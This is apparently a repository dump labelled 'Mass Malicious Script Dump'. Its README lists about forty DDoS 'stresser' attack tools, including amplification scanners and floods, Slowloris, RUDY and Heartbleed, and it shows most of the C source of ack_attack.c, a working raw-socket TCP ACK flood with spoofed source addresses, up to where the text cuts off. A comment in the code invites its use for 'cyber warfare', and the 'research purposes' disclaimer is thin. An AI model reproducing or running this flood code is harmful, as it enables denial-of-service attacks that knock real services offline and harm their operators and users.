├── LICENSE ├── README.md └── Stresser ├── ACK └── ack_attack.c ├── ARME └── arme_attack.c ├── CHARGEN ├── chargen.txt └── chargen_attack.c ├── DB2AMP ├── DB ├── db2_amp_attack.c └── db2_amp_scanner.c ├── DNS ├── DNSAMP └── dns_amp_scanner.c ├── DOMINATE └── dominate_attack.c ├── DRDOS └── drdos_attack.pl ├── ESSYN-ACK └── essyn_with_ack_attack.c ├── ESSYN └── essyn_attack.c ├── GHP └── get-head-post_attack.c ├── Heartbleed ├── heartbleed.c └── heartbleed_scanner.c ├── Improved SSYN └── improved_ssyn_attack.c ├── MDNS ├── mdns_amp_scanner.c └── mdns_attack.c ├── NETBIOS ├── netbios_amp_attack.c └── netbios_amp_scanner.c ├── NTP ├── ntp ├── ntp.txt ├── ntpList.txt ├── ntp_amp_scanner.pl └── ntp_attack.pl ├── OVH ├── OVH_ ├── ovh └── ovhfilter.php ├── QUAKE 3 └── quake_3_amp_attack.c ├── RUDY └── rudy_attack.c ├── SACK └── sack_attack.c ├── SENTINEL ├── sentinel_amp_attack.c └── sentinel_amp_scanner.c ├── SLOWLORIS └── slow ├── SNMP ├── snmp.txt ├── snmp_attack.c └── snmpscanner ├── SSDP ├── ssdp ├── ssdplist.txt └── ssdpscanner.c ├── SSYN With FIN └── ssyn_with_fin_attack.c ├── STCP └── stcp_attack.c ├── STD └── std.c ├── SUDP └── sudp_attack.c ├── SYN ├── SSYN ├── syn_attack.c └── synflooder.pl ├── Spoofed TELNET └── spoofed_telnet.c ├── TCP └── TCP ├── TRIGIMINI └── trigemini_attack.c ├── TS3 ├── teamspeak_3_amp_attack.c └── teamspeak_3_amp_scanner.c ├── UDP ├── udp.txt ├── udp_attack.c └── udpflood.pl ├── VSE ├── VSE └── vse_attack.c ├── WIZARD └── wizard ├── XACK └── xack_attack.c ├── XMLRPC ├── xmlrpc.txt ├── xmlrpc_(perl_version).pl └── xmlrpc_attack.php ├── XSYN └── xsyn_attack.c ├── ZAP └── zap_attack.c └── ddos_api.php /README.md: -------------------------------------------------------------------------------- 1 | # Mass Malicious Script Dump 2 | #### All responsibilities are at your own risk. 3 | #### Please use it only for research purposes. 4 | ## Stresser 5 | - ACK 6 | - ARME 7 | - CHARGEN 8 | - DB2AMP 9 | - DNS 10 | - OMINATE 11 | - DRDOS 12 | - ESSYN 13 | - ESSYN-ACK 14 | - GHP 15 | - Heartbleed 16 | - Improved SSYN 17 | - MDNS 18 | - NETBIOS 19 | - NTP 20 | - OVH 21 | - QUAKE 3 22 | - RUDY 23 | - SACK 24 | - SENTINEL 25 | - SLOWLORIS 26 | - SNMP 27 | - Spoofed TELNET 28 | - SSDP 29 | - SSYN With FIN 30 | - STCP 31 | - STD 32 | - SUDP 33 | - SYN 34 | - TCP 35 | - TRIGIMINI 36 | - TS3 37 | - UDP 38 | - VSE 39 | - WIZARD 40 | - XACK 41 | - XMLRPC 42 | - XSYN 43 | - ZAP 44 | 45 | ## BotNet 46 | - None 47 | ## RCS Software 48 | - None 49 | -------------------------------------------------------------------------------- /Stresser/ACK/ack_attack.c: -------------------------------------------------------------------------------- 1 | /* 2 | This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;) 3 | */ 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #define MAX_PACKET_SIZE 4096 21 | #define PHI 0x9e3779b9 22 | static unsigned long int Q[4096], c = 362436; 23 | volatile int limiter; 24 | volatile unsigned int pps; 25 | volatile unsigned int sleeptime = 100; 26 | void init_rand(unsigned long int x) 27 | { 28 | int i; 29 | Q[0] = x; 30 | Q[1] = x + PHI; 31 | Q[2] = x + PHI + PHI; 32 | for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } 33 | } 34 | unsigned long int rand_cmwc(void) 35 | { 36 | unsigned long long int t, a = 18782LL; 37 | static unsigned long int i = 4095; 38 | unsigned long int x, r = 0xfffffffe; 39 | i = (i + 1) & 4095; 40 | t = a * Q[i] + c; 41 | c = (t >> 32); 42 | x = t + c; 43 | if (x < c) { 44 | x++; 45 | c++; 46 | } 47 | return (Q[i] = r - x); 48 | } 49 | unsigned short csum (unsigned short *buf, int count) 50 | { 51 | register unsigned long sum = 0; 52 | while( count > 1 ) { sum += *buf++; count -= 2; } 53 | if(count > 0) { sum += *(unsigned char *)buf; } 54 | while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } 55 | return (unsigned short)(~sum); 56 | } 57 | unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { 58 | struct tcp_pseudo 59 | { 60 | unsigned long src_addr; 61 | unsigned long dst_addr; 62 | unsigned char zero; 63 | unsigned char proto; 64 | unsigned short length; 65 | } pseudohead; 66 | unsigned short total_len = iph->tot_len; 67 | pseudohead.src_addr=iph->saddr; 68 | pseudohead.dst_addr=iph->daddr; 69 | pseudohead.zero=0; 70 | pseudohead.proto=IPPROTO_TCP; 71 | pseudohead.length=htons(sizeof(struct tcphdr)); 72 | int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); 73 | unsigned short *tcp = malloc(totaltcp_len); 74 | memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); 75 | memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); 76 | unsigned short output = csum(tcp,totaltcp_len); 77 | free(tcp); 78 | return output; 79 | } 80 | void setup_ip_header(struct iphdr *iph) 81 | { 82 | iph->ihl = 5; 83 | iph->version = 4; 84 | iph->tos = 0; 85 | iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr); 86 | iph->id = htonl(54321); 87 | iph->frag_off = 0; 88 | iph->ttl = MAXTTL; 89 | iph->protocol = 6; 90 | iph->check = 0; 91 | iph->saddr = inet_addr("192.168.3.100"); 92 | } 93 | void setup_tcp_header(struct tcphdr *tcph) 94 | { 95 | tcph->source = htons(5678); 96 | tcph->seq = rand(); 97 | tcph->ack_seq = 1; 98 | tcph->res2 = 0; 99 | tcph->doff = 5; 100 | tcph->ack = 1; 101 | tcph->window = htons(65535); 102 | tcph->check = 0; 103 | tcph->urg_ptr = 0; 104 | } 105 | void *flood(void *par1) 106 | { 107 | char *td = (char *)par1; 108 | char datagram[MAX_PACKET_SIZE]; 109 | struct iphdr *iph = (struct iphdr *)datagram; 110 | struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); 111 | struct sockaddr_in sin; 112 | sin.sin_family = AF_INET; 113 | sin.sin_port = htons (rand() % 20480); 114 | sin.sin_addr.s_addr = inet_addr(td); 115 | int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); 116 | if(s < 0){ 117 | fprintf(stderr, ":: cant open raw socket. got root?\n"); 118 | exit(-1); 119 | } 120 | memset(datagram, 0, MAX_PACKET_SIZE); 121 | setup_ip_header(iph); 122 | setup_tcp_header(tcph); 123 | tcph->dest = htons (rand() % 20480); 124 | iph->daddr = sin.sin_addr.s_addr; 125 | iph->check = csum ((unsigned short *) datagram, iph->tot_len); 126 | int tmp = 1; 127 | const int *val = &tmp; 128 | if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ 129 | fprintf(stderr, ":: motherfucking error.\n"); 130 | exit(-1); 131 | } 132 | init_rand(time(NULL)); 133 | register unsigned int i; 134 | i = 0; 135 | while(1){ 136 | sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); 137 | iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF); 138 | iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); 139 | iph->check = csum ((unsigned short *) datagram, iph->tot_len); 140 | tcph->seq = rand_cmwc() & 0xFFFF; 141 | tcph->source = htons(rand_cmwc() & 0xFFFF); 142 | tcph->check = 0; 143 | tcph->check = tcpcsum(iph, tcph); 144 | pps++; 145 | if(i >= limiter) 146 | { 147 | i = 0; 148 | usleep(sleeptime); 149 | } 150 | i++; 151 | } 152 | } 153 | int main(int argc, char *argv[ ]) 154 | { 155 | if(argc < 5){ 156 | fprintf(stderr, "Invalid parameters!\n"); 157 | fprintf(stdout, "Usage: %s